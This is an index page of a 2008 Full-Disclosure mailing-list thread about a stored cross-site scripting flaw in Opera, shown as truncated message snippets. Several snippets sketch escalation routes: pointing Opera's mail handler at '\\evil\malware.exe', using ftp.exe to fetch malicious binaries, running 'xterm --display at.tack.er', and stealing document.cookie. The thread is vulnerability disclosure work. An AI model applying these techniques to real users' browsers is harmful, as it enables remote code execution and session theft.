Re: [Full-disclosure] Opera Stored Cross Site Scripting

2008-10-23 Thread Stefano Di Paola
Good job Aviv :) that's exactly what I intended when I said: ".. On Linux/Mac OS probably some program execution could be done using xterm --display at.tack.er in place of telnet program. Also maybe under Windows some \\att.tack.er\program.exe ? .." Roberto, for the q=Xss I found, just use the fo

Re: [Full-disclosure] Opera Stored Cross Site Scripting

2008-10-23 Thread Roberto Suggi
document.body.appendChild is the way. Cheers, Roberto From: avivra [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 12:52 p.m. To: 'Stefano Di Paola'; Roberto Suggi; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Hi, Just foun

Re: [Full-disclosure] Opera Stored Cross Site Scripting

2008-10-22 Thread avivra
Hi, Just found a way to use Stefano's opera:config idea to execute code from remote. Instead of changing the HTTP Proxy, an attacker can change the default external mail application to "\\evil\malware.exe ", or to local commands (e.g. ftp.exe which can be used to download malicious binaries fr

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
-Original Message- From: Stefano Di Paola [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 5:41 a.m. To: Roberto Suggi Cc: kuza55; full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability >Hi guys >I'm not a

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Stefano Di Paola
iginal Message- > From: kuza55 [mailto:[EMAIL PROTECTED] > Sent: Thursday, 23 October 2008 1:25 a.m. > To: Roberto Suggi > Cc: full-disclosure@lists.grok.org.uk > Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability > > >Is there any potential fo

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
-Original Message- From: kuza55 [mailto:[EMAIL PROTECTED] Sent: Thursday, 23 October 2008 1:25 a.m. To: Roberto Suggi Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability >Is there any potential for code execution h

Re: [Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread kuza55
Is there any potential for code execution here similar to XSS bugs in Firefox's chrome:// context or in IE's Local Zone? Also, you have a PoC which extracts document.cookie; which cookie does this acquire? From my understanding of this advisory the xss is rendered in opera:historysearch rather tha

[Full-disclosure] Opera Stored Cross Site Scripting Vulnerability

2008-10-22 Thread Roberto Suggi
Opera Stored Cross Site Scripting Vulnerability
Vendor Website: http://www.opera.com
Affected Version: All desktop versions
Public disclosure on 22nd October 2008